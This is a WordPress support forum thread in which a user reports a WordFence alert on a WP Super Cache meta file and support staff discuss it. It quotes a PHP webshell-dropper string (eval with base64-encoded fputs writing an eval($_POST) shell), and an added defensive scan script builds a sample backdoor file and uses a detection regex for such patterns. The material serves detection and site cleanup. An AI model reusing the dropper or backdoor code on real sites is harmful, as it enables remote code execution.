• Resolved tlgtimeshare

    (@tlgtimeshare)


    WordFence scan just flagged the following:

    • Filename: meta-wp-cache-903cc823335e8c894ee76962e8c7f802.php
    • File Type: Not a core, theme, or plugin file from wordpress.org.
    • Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: @eval($_GET%5B%27fuck%27%5D);&fuck=fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz54YnNoZWxs));gzip-text\/html”}

    The issue type is: Backdoor:PHP/rce.10912
    Description: Remote code execution that is often featured in backdoors

    This is the first instance of this happening. I have found some info here: https://wordpress.org/support/topic/frequent-malware-in-wp-super-cache-cached-pages/

    I have deleted the file, and after reading the thread above and the original from here it appears to be a false positive, but any feedback is appreciated. Thanks.
    • This topic was modified 8 months, 2 weeks ago by tlgtimeshare.
    • This topic was modified 8 months, 2 weeks ago by tlgtimeshare. Reason: extra info
Viewing 3 replies - 1 through 3 (of 3 total)
  • Plugin Support Alin (a11n)

    (@alinclamba)

    Hi @tlgtimeshare,

    Thanks so much for all the details — and for sharing both the file and the background research you did!

    At this point, we’ve passed this along to our developers for a closer review, just to make sure everything’s in order or if anything further should be done. We’ll follow up here once we hear back — we want to be 100% sure your site is safe.

    Thanks again for your patience in the meantime!

    (Internal ref: HOG Slack)

    This wasn’t put there by WP Super Cache, but you may have an attacker on your site, and they’re using the cache directory to put their malware. They could also be using your uploads directory or anywhere else that the web server can write to.

    Those meta files usually begin with <?php die(); to discourage people from trying to load them.
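
Two facts from the reply above give a site owner something concrete to check from a shell on the server: legitimate WP Super Cache meta files start with "<?php die();", and an attacker who can write to the cache directory (or uploads, or anywhere else the web server can write) may drop real executable PHP there. The script below is an added example, not code from WP Super Cache, WordFence or anyone in this thread. It walks a directory for .php files and reports two separate signals per file: MISSING-GUARD when the first 12 bytes are not the die guard, and PATTERN when the file contains the eval/base64_decode/$_GET style strings that WordFence matched in the original report. The directory layout, file names and serialized contents it builds are constructed for the example; the temp-dir location, and the exact regex, are assumptions.

```sh
#!/bin/sh
# Added example (not WP Super Cache's or WordFence's own code): triage .php files
# under a cache directory. Two independent checks per file:
#   MISSING-GUARD : file does not begin with "<?php die();", the prefix the
#                   reply above says legitimate meta files usually carry.
#   PATTERN       : file contains the eval/base64_decode/$_GET style strings
#                   that WordFence matched in the original report.
# A file with the guard intact but a PATTERN hit is worth a look (the strings
# may be sitting in recorded request data), while MISSING-GUARD plus PATTERN is
# executable code that something other than the plugin wrote.

# scan_cache_dir DIR
# Prints "TAG PATH" lines, sorted by path; a file can produce both tags.
scan_cache_dir() {
    dir="$1"
    find "$dir" -type f -name '*.php' | sort | while IFS= read -r f; do
        # Compare the first 12 bytes with the expected guard ("<?php die();").
        prefix=$(head -c 12 "$f")
        if [ "$prefix" != '<?php die();' ]; then
            printf 'MISSING-GUARD %s\n' "$f"
        fi
        # Regex assembled from the matched text in the report; an assumption,
        # not a WordFence signature.
        if grep -qE '@?eval\(|base64_decode\(|fputs\(fopen\(|\$_(GET|POST|REQUEST)' "$f"; then
            printf 'PATTERN %s\n' "$f"
        fi
    done
}

# make_sample_cache
# Builds a constructed cache tree in a temp dir and prints its path.
# File names and serialized payloads are made up for this example.
make_sample_cache() {
    root=$(mktemp -d)
    mkdir -p "$root/supercache/example.com"
    # Guard present, benign serialized data: what a normal meta file looks like.
    printf '<?php die(); ?>a:2:{s:3:"uri";s:1:"/";s:7:"headers";a:0:{}}' \
        > "$root/supercache/example.com/meta-wp-cache-ok.php"
    # Guard present, but the recorded request URI carries an attacker probe
    # string; a text-match scanner would still flag this file.
    printf '<?php die(); ?>a:1:{s:3:"uri";s:43:"/?x=@eval($_GET%%5Bcmd%%5D);&y=base64_decode(";}' \
        > "$root/supercache/example.com/meta-wp-cache-probe.php"
    # No guard and live code: a dropped backdoor.
    printf '<?php @eval($_POST["xiao"]); ?>' \
        > "$root/supercache/example.com/meta-wp-cache-dropped.php"
    printf '%s\n' "$root"
}

# Stand-alone usage: build the sample tree, scan it, clean up.
sample=$(make_sample_cache)
scan_cache_dir "$sample"
rm -rf "$sample"
```

On a real site, point scan_cache_dir at wp-content/cache (and wp-content/uploads) rather than the constructed tree; anything tagged MISSING-GUARD under the cache directory was not written by the plugin's meta-file logic and deserves the same treatment as the file deleted in this thread, together with a look at how it got there.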

  • Plugin Support Tamirat B. (a11n)

    (@tamirat22)

    Hello @tlgtimeshare,

    It’s been one week since this topic was last updated. I’m going to mark this thread as solved. If you have any further questions or need more help, you’re welcome to open another thread here. Cheers!


The topic ‘Backdoor:PHP/rce.1091’ is closed to new replies.